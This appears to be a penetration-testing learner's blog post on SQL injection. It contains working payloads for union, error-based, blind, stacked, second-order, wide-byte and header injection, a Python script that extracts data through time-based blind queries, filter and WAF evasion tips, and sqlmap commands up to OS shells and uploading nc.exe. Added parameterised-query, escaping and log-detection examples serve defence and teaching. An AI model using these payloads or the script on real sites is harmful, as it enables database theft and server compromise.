My blog only gets written when I am learning penetration testing, and so far it has nothing on WEB vulnerabilities. Now that I have found the WEB-level vulnerabilities I am not familiar with, I am writing notes to review them, starting with SQL.

Without further ado, first the cheat sheet written by the expert h3zh1, [ctfhub]SQL Inject - h3zh1 - Blog Garden; the basic manual injection commands are all collected there.

union select: the joint query; union injection is the most commonly used technique
database(): echoes the name of the currently connected database
version(): shows the current SQL server version, e.g. mysql 1.2.3 or mariadb-4.5.6
group_concat(): joins the values of the same group with commas into one string
information_schema: the database in which MySQL stores a lot of its own metadata
information_schema.schemata: the table in the information_schema database called schemata
schema_name: the field of schemata that stores the names of all MySQL databases
information_schema.tables: stores all MySQL tables
table_schema: the field of tables that stores the database name each table belongs to
table_name: the table's name; corresponds one-to-one with table_schema
information_schema.columns: the table that stores the information of all columns
column_name: once a table's name is known, all field names of that table can be obtained through this column
table_name: the table's name; corresponds one-to-one with column_name
select updatexml(1,concat(0x7e,database(),0x7e),1); note that you only have to put the content you want at database(); it is then echoed in the error message
right(str, num): takes num characters from the right end of the string
left(str,num): likewise, takes num characters from the left end of the string
substr(str,N,M): starting at character N of the string, takes M characters

Principle of SQL injection

An SQL injection vulnerability arises when the following two conditions are met:

  • User-controlled parameter: the parameter passed from the front end to the back end can be controlled by the user.
  • The parameter is brought into the database query: the incoming parameter is spliced into the SQL statement and brought into the database for the query.

When the incoming id parameter is 1 and 1=1, the executed SQL statement is (the # symbol is the comment character):

select * from users where id=1 and 1=1#

Because 1=1 is true and id=1 in the where clause is also true, the page returns the same result as for id=1. When the incoming id parameter is 1 and 1=2, 1=2 does not hold, so the condition is false and the page returns a result different from id=1.

With this short statement you can make a preliminary judgement of whether the parameter has an SQL injection hole. Once that is verified, an attacker can splice further SQL statements to attack, causing the database to leak and even gaining server privileges.
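The two conditions above, as an added illustration that is not part of the original post: a lookup that splices the id parameter into the statement next to one that binds it as a parameter. SQLite stands in for MySQL so it runs offline, which is also why the MySQL-only # comment is left off the probes.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the page's `users` table (sample data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_vulnerable(conn, id_param):
    # Both conditions from the text hold: the value is user controlled AND it is
    # spliced straight into the statement, so anything after the number runs as SQL.
    sql = "SELECT username FROM users WHERE id=" + id_param
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, id_param):
    # The mitigation: the value is bound as a parameter, so it is only ever a value.
    # "1 and 1=1" is compared as one string against id and matches nothing.
    sql = "SELECT username FROM users WHERE id=?"
    return [row[0] for row in conn.execute(sql, (id_param,))]


def probe(lookup):
    # Run the three requests the text walks through and return what each echoes.
    conn = make_db()
    return {
        "1":         lookup(conn, "1"),
        "1 and 1=1": lookup(conn, "1 and 1=1"),
        "1 and 1=2": lookup(conn, "1 and 1=2"),
    }


if __name__ == "__main__":
    # Spliced: the true probe echoes the same row as id=1, the false probe echoes
    # nothing, which is exactly the difference an attacker looks for.
    print("spliced:      ", probe(lookup_vulnerable))
    # Bound: both probes echo nothing, so the test reveals nothing about the query.
    print("parameterised:", probe(lookup_safe))
```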


Union Injection attack

After finding the injection point, use order by to determine the number of fields in the data table.

For example, entering this echoes the same result as id=1:

id=1 order by 4#

But order by 5 echoes a different result, so the number of fields is 4.

After determining the number of fields, use union injection to find the position of the echoed field.

When using union, set the injection parameter to -1; otherwise the database returns the rows for the real parameter value first and the echo position cannot be determined.

id=-1 union select 1,2,3,4#

Then put the attack code into the echoed field. For example, if 2 is the echoed field, entering database() shows the database name:

id=-1 union select 1,database(),3,4#

Suppose the database name turns out to be sqli. Knowing the database name, query the table names; the group_concat function joins the values of the same group with commas into one string:

id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="sqli"),3,4#

Suppose the table name turns out to be flag. Query the field names:

id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name="flag"),3,4#

Knowing the field name, read the field:

id=-1 union select 1,(select group_concat(flag) from sqli.flag),3,4#

This is the basic idea of union injection, but in practice there are many filters to prevent attackers from obtaining database information.


Error injection attack

Error-based injection is used after the injection point has been determined but there is no echoed field; it only works when the page displays the error message.

The key command is select updatexml(1,concat(0x7e,database(),0x7e),1); put the statement you want to run in place of database().

0x7e is the ASCII code for ~; it is used to separate the key information from the system error text.

The rest of the idea is the same as union injection, but note that you need the right and left functions to read the fields echoed in the error, because the number of characters echoed by the error is usually limited while the database information required is relatively long.

right(str, num): takes num characters from the right end of the string
left(str,num): likewise, takes num characters from the left end of the string

Usage example:

-1 union select updatexml(1,concat(0x7e,right((select(group_concat(schema_name))from information_schema.schemata),31),0x7e),1); #


Boolean Injection attack

When the page only shows yes or no and returns no data from the database at all, Boolean injection is used.

First use the length() function to determine the length of the database name:

id=1 and length(database())>=1#

After finding the length of the database name, use the substr function to get the database name one character at a time. The characters of a database name are generally within a~z and 0~9, with possibly some special characters.

substr(str,N,M): starting at character N of the string, takes M characters

id=1 and substr(database(),1,1)='a'#

Done by hand this is slow and inefficient, so brute forcing is generally used; you can brute force with Burp Suite (bp) and use the byte length of the returned response to judge whether a guess is correct.

Once the database name is exposed, the following steps are the same as before.


Time injection attack

Time injection is almost the same as Boolean injection; the difference is that time injection is used when nothing is returned at all, not even when the condition is correct.

Time injection uses the sleep function to make MySQL's execution time longer, and judges from that whether the injection succeeded.

The statement to judge the length of the database name is

id=1 and if(length(database())>1,sleep(5),1)#

This means: if the length of the database name is greater than 1, pause for five seconds and then execute; otherwise execute directly.

Once time-based blind injection is understood, you can attack with the same idea as before.


But manual time-based blind injection is even slower than Boolean injection, so a Python script is usually used for the brute force.

Here is the code:

import requests
import time

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
}
word1 = []  # character set with upper-case letters (built but not used below)
word2 = []  # character set actually used: lower-case letters, digits and '}'
# url = input("url:")
# t = input("sleep:")
for i in range(65, 91):
    word1.append(chr(i))
for i in range(97, 123):
    word1.append(chr(i))
for i in range(48, 58):
    word1.append(chr(i))
word1.append('}')
for i in range(97, 123):
    word2.append(chr(i))
for i in range(48, 58):
    word2.append(chr(i))
word2.append('}')
for i in range(1, 40):  # position in the flag
    for j in word2:     # candidate character for that position
        url = "http://URL/?id=1 and if(substr((select flag from sqli.flag)," + str(i) + ",1)='" + str(j) + "',sleep(3),1)#"
        t1 = time.time()
        r = requests.get(url, headers=headers)  # send the GET request; returns a Response object
        t2 = time.time()
        if t2 - t1 > 3:  # the response was delayed, so this character is correct
            print(j, end="", flush=True)
            break

Stacked injection attack

Stacked queries execute multiple statements, each separated by a semicolon. The difference between stacked injection and union injection is that stacked injection can execute any statement, while union injection is limited to query statements.

For example, you can insert data into or delete data from the database:

id=1;insert into user(id,username,password)values('5','zhangsan','123456');#


Second-order injection attack

Second-order injection means the attacker stores the attack code in the database through registration or some other means; when the database later uses that stored code again, the attack takes effect.

For example, the database already has an admin account but we do not know its password. Registering an account named admin'# constructs a closure; when that account then changes its password, the database's original statement becomes

update user set password='New password' where username='admin'#' and password='password'

Because admin is followed by #, the rest of the statement is not executed, so the database changes admin's password to the one we just set.


Wide byte injection attack

Wide byte injection is used when the closing quote is escaped with a backslash; normally there is then no SQL injection bug. The exception is when the database charset is GBK.

The backslash is encoded as %5c, and in GBK the two bytes %df%5c together form one two-byte character. So adding %df in front of the escaped character swallows the escape.
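The GBK mechanism just described, worked through in code as an added example (not from the original post): byte-oriented escaping in the style of addslashes() next to the check a defender would want, decoding with the connection charset before escaping. The %df input is constructed.

```python
def escape_bytes(data: bytes) -> bytes:
    # Byte-oriented escaping (addslashes() style): put a backslash (0x5c) before
    # every single quote. It never looks at the byte that precedes the quote.
    return data.replace(b"'", b"\\'")


def mysql_sees(escaped: bytes) -> str:
    # A GBK connection decodes the escaped bytes as GBK before parsing the SQL.
    return escaped.decode("gbk")


def quote_survives(user_input: bytes) -> bool:
    # True when a quote reaches the parser unescaped, i.e. the inserted 0x5c was
    # absorbed into a two-byte GBK character by the 0xdf lead byte before it.
    text = mysql_sees(escape_bytes(user_input))
    idx = text.find("'")
    return idx != -1 and (idx == 0 or text[idx - 1] != "\\")


def escape_text(user_input: bytes, charset: str = "gbk"):
    # Mitigation: decode to text with the connection's charset first, rejecting
    # input that is not valid in that charset, then escape characters, not bytes.
    # (Parameterised queries remove the problem entirely.)
    try:
        text = user_input.decode(charset)
    except UnicodeDecodeError:
        return None
    return text.replace("'", "\\'")


if __name__ == "__main__":
    payload = b"\xdf'"  # constructed: %df followed by a quote
    print(escape_bytes(payload))        # bytes 0xdf 0x5c 0x27
    print(quote_survives(payload))      # True: 0xdf 0x5c became one character
    print(quote_survives(b"plain'"))    # False: the backslash still precedes the quote
    print(escape_text(payload))         # None: 0xdf 0x27 is not valid GBK, input rejected
```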

XFF Injection attack

Capture the request with BurpSuite and you can see the X-Forwarded-For header in the HTTP request headers. X-Forwarded-For, abbreviated XFF, carries the real IP of the client; by modifying the X-Forwarded-For value the IP can be forged. After setting X-Forwarded-For and visiting the URL, the page returns normally.

Then complete the injection with the union method:

X-Forwarded-For:' union select 1,2,3,4#


SQL Injection bypass technology

There are too many bypass methods, and each applies in different scenarios, so they are not covered in detail here; the common methods are listed:

  1. Case bypass: commonly used against keyword filtering; MySQL keywords are case-insensitive, so mixed case can bypass the filter
  2. Double-writing bypass: commonly used against keyword filtering; for example, if and is filtered (removed once), it can be written as anandd
  3. Encoding bypass: commonly used against keyword filtering; URL-encode the filtered keyword twice, because the server automatically decodes it once
  4. Space bypass: when spaces are filtered, use /**/ instead of spaces
  5. Inline comment bypass: commonly used against keyword filtering; wrap the keyword in /*! and */, e.g. /*!and*/

When injecting manually, several bypass methods can be combined, which raises the probability of success.
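From the defender's side, the bypasses above are what a detector has to undo before it can recognise the payloads from the earlier sections. The following is an added example (not from the original post) that normalises query-string values from constructed access-log lines and flags the page's union, error, Boolean, time and stacked patterns per client IP; the log format and IPs are made up.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (sample data). Format: client_ip "METHOD path" status.
# The payloads mirror this page's sections, written with the case, comment and
# double-URL-encoding bypasses listed above.
SAMPLE_LOG = """\
10.0.0.5 "GET /?id=1" 200
10.0.0.9 "GET /?id=1%20order%20by%204%23" 200
10.0.0.9 "GET /?id=-1%20UnIoN%20SeLeCt%201,database(),3,4%23" 200
10.0.0.9 "GET /?id=-1%20union/**/select%201,group_concat(table_name)%20from%20information_schema.tables,3,4%23" 200
10.0.0.9 "GET /?id=1%20and%20if(substr(database(),1,1)='s',sleep(3),1)%23" 200
10.0.0.9 "GET /?id=1%2520/*!and*/%2520length(database())%253E%253D1%2523" 200
10.0.0.9 "GET /?id=1;insert%20into%20user(id)values('5')%23" 500
10.0.0.7 "GET /?id=42&sort=name" 200
"""

# One regex per technique on the page, applied to the normalised parameter value.
PATTERNS = {
    "probe":   re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+|\border\s+by\s+\d+"),
    "union":   re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema":  re.compile(r"\binformation_schema\."),
    "error":   re.compile(r"\bupdatexml\s*\("),
    "boolean": re.compile(r"\b(and|or)\s+(length|substr)\s*\("),
    "time":    re.compile(r"\bsleep\s*\("),
    "stacked": re.compile(r";\s*(insert|update|delete|drop)\b"),
}


def normalise(value):
    # Undo the bypasses: decode twice (double URL-encoding), fold case, and turn
    # /**/ and /*!...*/ comments back into the whitespace or keyword they hide.
    text = unquote(unquote(value)).lower()
    text = re.sub(r"/\*!?(.*?)\*/", r" \1 ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).strip()


def parameter_values(path):
    # Yield each query-string value URL-decoded once (what the server sees first).
    for pair in urlsplit(path).query.split("&"):
        yield unquote(pair.partition("=")[2])


def classify(line):
    # Returns (client_ip, set of technique names matched in this request).
    ip = line.split(" ", 1)[0]
    path = line.split('"')[1].split(" ", 1)[1]
    hits = set()
    for value in parameter_values(path):
        text = normalise(value)
        hits.update(name for name, rx in PATTERNS.items() if rx.search(text))
    return ip, hits


def scan(log_text):
    # Per-IP count of flagged requests and the set of techniques seen from that IP.
    flagged, techniques = Counter(), {}
    for line in log_text.splitlines():
        ip, hits = classify(line)
        if hits:
            flagged[ip] += 1
            techniques.setdefault(ip, set()).update(hits)
    return flagged, techniques
```

A single flagged request is a lead, not proof; the per-IP count is what separates a scanner or a character-by-character extraction from a one-off odd parameter.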

Introduction to the automated tool sqlmap

sqlmap is an automated tool for SQL injection vulnerabilities.

sqlmap -h shows the help.

sqlmap basics

GET parameters

Read the current user and current database:

sqlmap -u http://URL/?id=1 --current-user --current-db

Detect whether there are injection points

sqlmap -u http://URL/?id=1

Get the database names:

sqlmap -u http://URL/?id=1 --dbs

Suppose you get the database name sqli. Get the table names:

sqlmap -u http://URL/?id=1 -D sqli --tables

Suppose you get the table name user. Get the column names:

sqlmap -u http://URL/?id=1 -D sqli -T user --columns

Suppose you get the column names user,password. Dump the fields:

sqlmap -u http://URL/?id=1 -D sqli -T user -C user,password --dump

POST parameters

When the data is submitted with POST, capture the request with Burp and save it as the text file test.txt (if test.txt is not in the sqlmap directory, use an absolute path).

sqlmap -r test.txt -p id //-r opens the request file, -p names the parameter to inject.

The rest is the same as with GET.

sqlmap advanced

This part is mainly about how to bypass a WAF.

  • --level=5: detection level, 1-5, default 1. The higher the level, the more payloads and the slower the speed. HTTP Cookie is tested from level 2, HTTP User-Agent/Referer from level 3.
  • --risk=RISK: risk of the tests to perform (0-3, default 1)
  • --threads    # use multiple threads (--threads 3)
  • --referer=""  // fake the source, i.e. which page you jumped from. If you don't know what that is, google "referer"
  • --cookie=COOKIE: set the cookie of the HTTP request; at level 2 sqlmap will try to inject into the cookie, e.g. "PHPSESSID=aaaa"
  • --user-agent: modify the User-Agent in the HTTP request. It is usually changed to a search engine UA to imitate a search engine and avoid getting the IP banned. You can also use the --random-agent parameter to pick one at random from user-agent.txt. (Level 3 will try to inject into the User-Agent.)

  • --proxy=PROXY: connect to the target URL through a proxy server
  • --delay=seconds: delay between requests, in seconds, to avoid attracting the firewall's attention

Of course, the simplest and most brutal way is a proxy pool: buy proxies online (there are free ones too, but they are not easy to use), set --proxy=proxy-ip and change the IP on every request, and the firewall will not detect it.

sqlmap advanced (continued)

  • --is-dba: whether the current user has administrator (DBA) rights
  • --roles: list database administrator roles; only applicable when the current database is Oracle
  • --referer=: sqlmap can forge the HTTP referer in the request; when --level is set to 3 or above it will try to inject into the referer
  • --sql-shell: run custom SQL statements
  • --os-cmd, --os-shell: run arbitrary operating system commands
  • --file-read "C:/example.exe": read a file from the database server
  • -u URL --file-write "/software/nc.exe" --file-dest "C:/WINDOWS/Temp/nc.exe": upload a file to the database server
